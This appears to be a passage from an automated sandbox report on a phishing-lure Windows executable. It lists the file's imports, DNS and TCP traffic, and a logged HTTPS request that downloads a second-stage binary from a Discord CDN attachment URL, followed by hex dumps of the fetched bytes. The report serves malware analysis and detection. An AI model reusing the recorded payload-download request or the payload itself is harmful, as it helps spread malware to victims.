              advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
              oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
              kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
              advapi32.dllRegQueryValueExA, RegOpenKeyExA, RegCloseKey
              kernel32.dlllstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryW, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteFileA, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
              version.dllVerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
              gdi32.dllUnrealizeObject, StretchDIBits, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetPaletteEntries, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, ResizePalette, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPolyFillMode, GetPixelFormat, GetPixel, GetPaletteEntries, GetObjectA, GetNearestPaletteIndex, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CloseEnhMetaFile, BitBlt
              user32.dllCreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowTextA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
              kernel32.dllSleep
              oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
              ole32.dllCreateStreamOnHGlobal, IsAccelerator, OleDraw, OleSetMenuDescriptor, CoTaskMemFree, ProgIDFromCLSID, StringFromCLSID, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
              oleaut32.dllGetErrorInfo, GetActiveObject, SysFreeString
              comctl32.dllImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
              urlOpenURL

              Possible Origin

              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States

              Network Behavior

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Jan 14, 2022 11:25:30.602159977 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:30.602216005 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:30.602305889 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:30.625173092 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:30.625268936 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:30.676666975 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:30.676776886 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:30.952516079 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:30.952562094 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:30.953139067 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:30.953227043 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:30.957005024 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:30.997868061 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:30.999130964 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:30.999264956 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:30.999308109 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:30.999377966 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:30.999391079 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:30.999418020 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:30.999450922 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:30.999468088 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:30.999500036 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:30.999548912 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:30.999576092 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:30.999625921 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:30.999641895 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:30.999701023 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:30.999715090 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:30.999782085 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:30.999794960 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:30.999855042 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:30.999864101 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:30.999923944 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:30.999937057 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:30.999986887 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:30.999999046 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.000051022 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:31.000063896 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.000118017 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:31.000129938 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.000179052 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:31.000190973 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.000241995 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:31.000253916 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.000307083 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:31.000315905 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.000384092 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.000449896 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.000464916 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:31.000480890 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.000494957 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:31.000500917 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:31.000524998 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:31.000538111 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.000591040 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:31.000591993 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.000612974 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.000638962 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:31.000677109 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:31.000690937 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.000739098 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:31.000751972 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.000806093 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:31.000813961 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.000833988 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.000864029 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:31.000900984 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:31.000912905 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.000974894 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:31.000984907 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.001003027 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.001070023 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:31.001080990 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:31.001092911 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.001142979 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:31.001152992 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.001173019 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.001202106 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:31.001231909 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:31.001244068 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.001297951 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:31.001310110 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.001368046 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.001405001 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:31.001422882 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.001436949 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:31.001477003 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:31.001486063 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.001537085 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:31.001543999 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.001562119 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.001594067 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:31.001614094 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:31.001626015 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.001679897 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:31.001693964 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.001715899 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.001770973 CET49774443192.168.2.4162.159.135.233
              Jan 14, 2022 11:25:31.001782894 CET44349774162.159.135.233192.168.2.4
              Jan 14, 2022 11:25:31.001796961 CET49774443192.168.2.4162.159.135.233

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Jan 14, 2022 11:25:30.564100981 CET4925753192.168.2.48.8.8.8
              Jan 14, 2022 11:25:30.587327003 CET53492578.8.8.8192.168.2.4
              Jan 14, 2022 11:26:08.922663927 CET4991053192.168.2.48.8.8.8
              Jan 14, 2022 11:26:08.943587065 CET53499108.8.8.8192.168.2.4
              Jan 14, 2022 11:26:21.076616049 CET5585453192.168.2.48.8.8.8
              Jan 14, 2022 11:26:21.097568035 CET53558548.8.8.8192.168.2.4

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
              Jan 14, 2022 11:25:30.564100981 CET192.168.2.48.8.8.80x480cStandard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
              Jan 14, 2022 11:26:08.922663927 CET192.168.2.48.8.8.80xd8f4Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)
              Jan 14, 2022 11:26:21.076616049 CET192.168.2.48.8.8.80xd4c8Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
              Jan 14, 2022 11:25:30.587327003 CET8.8.8.8192.168.2.40x480cNo error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
              Jan 14, 2022 11:25:30.587327003 CET8.8.8.8192.168.2.40x480cNo error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
              Jan 14, 2022 11:25:30.587327003 CET8.8.8.8192.168.2.40x480cNo error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
              Jan 14, 2022 11:25:30.587327003 CET8.8.8.8192.168.2.40x480cNo error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
              Jan 14, 2022 11:25:30.587327003 CET8.8.8.8192.168.2.40x480cNo error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
              Jan 14, 2022 11:26:08.943587065 CET8.8.8.8192.168.2.40xd8f4No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)
              Jan 14, 2022 11:26:08.943587065 CET8.8.8.8192.168.2.40xd8f4No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
              Jan 14, 2022 11:26:08.943587065 CET8.8.8.8192.168.2.40xd8f4No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
              Jan 14, 2022 11:26:08.943587065 CET8.8.8.8192.168.2.40xd8f4No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
              Jan 14, 2022 11:26:08.943587065 CET8.8.8.8192.168.2.40xd8f4No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
              Jan 14, 2022 11:26:21.097568035 CET8.8.8.8192.168.2.40xd4c8No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)
              Jan 14, 2022 11:26:21.097568035 CET8.8.8.8192.168.2.40xd4c8No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)
              Jan 14, 2022 11:26:21.097568035 CET8.8.8.8192.168.2.40xd4c8No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)
              Jan 14, 2022 11:26:21.097568035 CET8.8.8.8192.168.2.40xd4c8No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)
              Jan 14, 2022 11:26:21.097568035 CET8.8.8.8192.168.2.40xd4c8No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)

              HTTP Request Dependency Graph

              • cdn.discordapp.com

              HTTPS Proxied Packets

              Session IDSource IPSource PortDestination IPDestination PortProcess
              0192.168.2.449774162.159.135.233443C:\Users\user\Desktop\Nova narudzba u prilogu.exe
              TimestampkBytes transferredDirectionData
              2022-01-14 10:25:30 UTC0OUTGET /attachments/909752051695775778/931434691809124392/Ajshkennychvrlvyqvxklxbhfqfzgvr HTTP/1.1
              User-Agent: lVali
              Host: cdn.discordapp.com
              2022-01-14 10:25:30 UTC0INHTTP/1.1 200 OK
              Date: Fri, 14 Jan 2022 10:25:30 GMT
              Content-Type: application/octet-stream
              Content-Length: 466432
              Connection: close
              CF-Ray: 6cd629288f8c6951-FRA
              Accept-Ranges: bytes
              Age: 7897
              Cache-Control: public, max-age=31536000
              Content-Disposition: attachment;%20filename=Ajshkennychvrlvyqvxklxbhfqfzgvr
              ETag: "160f746c3471a01d756cd5438ae7899d"
              Expires: Sat, 14 Jan 2023 10:25:30 GMT
              Last-Modified: Fri, 14 Jan 2022 06:28:55 GMT
              Vary: Accept-Encoding
              CF-Cache-Status: HIT
              Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
              Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
              x-goog-generation: 1642141735792380
              x-goog-hash: crc32c=BMufiQ==
              x-goog-hash: md5=Fg90bDRxoB11bNVDiueJnQ==
              x-goog-metageneration: 1
              x-goog-storage-class: STANDARD
              x-goog-stored-content-encoding: identity
              x-goog-stored-content-length: 466432
              X-GUploader-UploadID: ADPycdvgVw86lNODc_FUvxJ5vBPBPwu7yWNJ-fM7Bf9Y4Jwa0j518QQwomxRFtc2-ZlqlgwH5n6LpEXFuy97oIiXV5o
              X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
              2022-01-14 10:25:30 UTC1INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 49 41 75 78 6b 69 54 77 47 73 51 66 73 6b 6e 68 50 76 6a 4f 77 6d 30 25 32 46 45 45 36 41 4c 25 32 42 6b 51 6b 33 65 66 70 53 43 35 37 25 32 46 46 41 56 31 77 4d 63 6d 59 44 6c 56 44 6c 6a 59 25 32 46 38 37 42 32 34 72 6c 47 32 48 45 65 71 73 58 36 6c 4d 33 25 32 42 69 6c 68 55 52 55 56 44 6f 64 25 32 42 67 52 76 49 42 61 6f 31 6a 62 62 46 33 77 65 55 48 35 7a 7a 59 44 67 68 5a 39 57 53 52 66 42 37 68 67 79 59 41 6e 72 35 36 69 33 41 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78
              Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IAuxkiTwGsQfsknhPvjOwm0%2FEE6AL%2BkQk3efpSC57%2FFAV1wMcmYDlVDljY%2F87B24rlG2HEeqsX6lM3%2BilhURUVDod%2BgRvIBao1jbbF3weUH5zzYDghZ9WSRfB7hgyYAnr56i3A%3D%3D"}],"group":"cf-nel","max
              2022-01-14 10:25:30 UTC1INData Raw: 18 da 04 39 22 f7 4a 5b f6 c6 57 ec 36 9e 95 6a 0a 39 28 89 53 db 8c ce 77 a1 05 b7 39 27 6e 03 b6 bc 46 4a 4f d3 fa c1 d4 73 af 2f 14 d5 ef a1 14 d3 f5 4f d3 ff 5d e6 22 fd 51 df 91 68 1e f2 d8 01 a4 9a f9 4b cf e2 1b 6d 90 e2 18 dc 1f 74 30 95 7c 33 1d 6c 16 c8 64 0b 49 cd ea 2f 00 30 8a de 1d 61 fa d5 fe ca 60 72 2d 0f 4d d3 eb a8 84 cb e7 ae ad 23 74 38 a3 1f 65 83 4e 55 f4 dc 17 5d f8 c4 5e 7c 3b 3a af 25 73 a2 8a d8 16 c0 49 ce 7e 36 9b 7b b9 d1 f1 b3 3d 2b 03 af 3b 32 8e e5 ad 2e 89 53 de 03 a9 10 c2 51 df 94 ff 44 a6 90 e8 20 ea 2a 84 dc 08 37 28 84 c8 62 11 55 fc d1 f8 c4 5e 7c 3b 3a af 25 73 a2 8a d8 16 c0 49 ce 7e 36 9b 7b b9 d1 f2 c1 c3 f5 63 a2 a1 1c f4 d7 a2 aa b2 a1 23 67 fc a6 8f 73 bf da 65 93 7e 2d 24 92 9b 0f 7f 53 f0 2b 62 6b b1 1f 78
              Data Ascii: 9"J[W6j9(Sw9'nFJOs/O]"QhKmt0|3ldI/0a`r-M#t8eNU]^|;:%sI~6{=+;2.SQD *7(bU^|;:%sI~6{c#gse~-$S+bkx
              2022-01-14 10:25:30 UTC2INData Raw: 1c 5e d2 c4 e8 8e 43 8c 60 da a7 a7 be ea 87 f2 67 3e 1e 40 12 77 0c 61 50 f2 7a 94 5d 48 fd e5 05 01 0f e7 0c 60 c4 fc 66 b1 99 c2 ec 8f c7 50 f8 6c ab 99 d5 44 03 0d f6 75 15 e9 0f e6 9d a7 a5 a9 bb 67 29 b9 63 21 d5 4f 79 12 61 50 ff e4 93 c7 59 51 7f f9 f1 1f cc db 35 a7 b6 12 66 aa 09 1b c0 fb f2 69 2e 2b ac 04 97 d0 d2 d9 2b a2 3c 16 69 32 3c 12 71 1f c7 58 d0 da b6 09 1b c6 fd e1 3b 8b e0 bd 60 de aa 1e 44 13 fe 63 20 54 c7 4b 61 40 08 85 e0 bc eb 1a 48 fb f1 13 f0 9f ae 09 09 1a 47 6f 33 a0 35 b2 10 77 06 95 d6 a8 37 91 c0 e9 02 8f c9 5d 55 41 83 e3 2f b9 66 bb 61 51 6b 3a 0e 63 2d ac 1e 50 fe 70 83 e9 12 7d 18 78 81 e2 ad 9e 20 48 fd e0 b7 9f ad 9f b5 80 68 a1 bd 77 11 f2 60 c4 fd f1 0c 72 83 f3 f3 e2 be ea 91 cd 49 72 83 ee 8d c2 f9 e5 00 85 e4
              Data Ascii: ^C`g>@waPz]H`fPlDug)c!OyaPYQ5fi.++<i2<qX;`Dc TKa@HGo35w7]UA/faQk:c-Pp}x Hhw`rIr
              2022-01-14 10:25:30 UTC4INData Raw: 1a 48 fb f1 13 f0 9f ae 09 09 1a 47 6f 33 a0 35 b2 10 77 06 95 d6 a8 37 91 c0 e9 02 8f c9 5d 55 41 83 e3 2f b9 66 bb 61 51 6b 3a 0e 63 2d ac 1e 50 fe 70 83 e9 12 7d 18 78 81 e2 ad 9e 20 48 fd e0 b7 9f ad 9f b5 80 68 a1 bd 77 11 f2 60 c4 fd f1 0c 72 83 f3 f3 e2 be ea 91 cd 49 72 83 ee 8d c2 f9 e5 00 85 e4 8a 7c 96 5e c8 ce d1 4f 72 99 db 29 a2 2d a6 2e 2f a1 b4 10 68 b4 0f ea 9f b0 16 72 9b d6 a2 3f 95 c9 4f 68 b2 12 6a bf 6e b0 14 6d 36 32 38 09 1e 55 5c d9 35 af 8c 7f f1 03 08 94 51 7c 9c 28 21 d6 b0 02 86 77 17 f9 ec 9c 2a 3f 91 db 33 a3 ac 03 1c 43 92 40 17 e2 ba f4 7c 93 d5 46 fe 79 04 91 c8 df 2e 22 48 fa 72 96 49 77 10 68 a1 b4 12 73 1a 44 1f c9 5e da a8 38 14 7a 90 48 e9 0a 86 62 ab 9b c3 73 1e 54 c0 f1 0d fc 6c b8 16 71 01 03 0e 64 af 8a 70 9e 23
              Data Ascii: HGo35w7]UA/faQk:c-Pp}x Hhw`rIr|^Or)-./hr?Ohjnm628U\5Q|(!w*?3C@|Fy."HrIwhsD^8zHbsTlqdp#
              2022-01-14 10:25:30 UTC5INData Raw: d9 35 af 8c 7f f1 03 08 94 51 7c 9c 28 21 d6 b0 02 86 77 17 f9 ec 9c 2a 3f 91 db 33 a3 ac 03 1c 43 92 40 17 e2 ba f4 7c 93 d5 46 fe 79 04 91 c8 df 2e 22 48 fa 72 96 49 77 10 68 a1 b4 12 73 1a 44 1f c9 5e da a8 38 14 7a 90 48 e9 0a 86 62 ab 9b c3 73 1e 54 c0 f1 0d fc 6c b8 16 71 01 03 0e 64 af 8a 70 9e 23 de b2 15 f0 9d a3 b2 17 e8 93 dc ad 8d de ad 9a 56 de a9 b0 11 ff fc 73 05 0a 9f a9 a5 b0 07 15 ef 07 19 f2 6c ae 0a 84 69 3b 85 f0 86 6c b9 65 24 5d 5f 46 e1 34 39 82 61 5e ca c6 f8 67 22 4a f4 6b 37 9d aa 00 8c 74 83 fa 78 89 f9 ec 9f b0 0e 62 ba ed 05 1a 46 f1 1a 4e e4 8e 44 1a 4f 70 9b c5 7b 12 6c b4 08 8b ff f9 ff fb e2 a5 b0 0b fa 69 3f 91 cc d3 46 fb f8 62 b0 10 75 14 74 90 41 91 d8 b6 1c 5f 4b 6e b9 67 33 bd 6d 22 54 c6 e4 83 e6 8f c7 4d 78 9a 58
              Data Ascii: 5Q|(!w*?3C@|Fy."HrIwhsD^8zHbsTlqdp#Vsli;le$]_F49a^g"Jk7txbFNDOp{li?FbutA_Kng3m"TMxX
              2022-01-14 10:25:30 UTC6INData Raw: 59 f8 13 20 fc 00 5c 53 0e b1 2b d9 3e b5 ff 06 ef 19 07 ce d0 27 0b e2 e2 48 1f 1e 22 cb 73 1e 9c 44 ec 84 3b 12 9b 72 f7 10 09 39 e2 5c af f4 93 65 38 7b 68 c9 58 03 c9 54 db fa c0 9b 14 ca 1f df 68 c2 36 1b 36 94 57 7a 59 32 ee 68 db f1 ca 69 be be fd a5 e3 7d e3 1c 03 bd fc 94 89 39 79 b2 cd 90 2b 59 5d 8c 72 f9 8a 07 4a 0d ec 6d e4 fa 87 f8 bf 77 6b 75 ca 26 54 3a 26 9f 8b 6c 83 1e 93 dc 53 14 ac e2 d4 dc 04 38 16 ad 8b 1b 9c 50 4e 58 b0 13 ba b1 d1 bf 4d 2d 29 6f 10 04 77 67 d3 02 89 91 22 0c 10 0b 01 59 32 20 c6 e9 01 17 1f 13 97 2d c5 bc e6 8e 40 0d e0 07 0d 5c 30 1a ca de cb 4a 5b b5 e5 00 6b ef 15 1f e0 ed 7b e6 29 aa 65 ab 84 19 3f 8f a7 dc 54 98 58 3d d7 3e e6 dd 21 3b e6 91 2d 72 92 4d 35 b0 12 78 3b 30 53 26 00 dd ca e1 6e 0a 32 35 0e a3 3f
              Data Ascii: Y \S+>'H"sD;r9\e8{hXTh66WzY2hi}9y+Y]rJmwku&T:&lS8PNXM-)owg"Y2 -@\0J[k{)e?TX=>!;-rM5x;0S&n25?
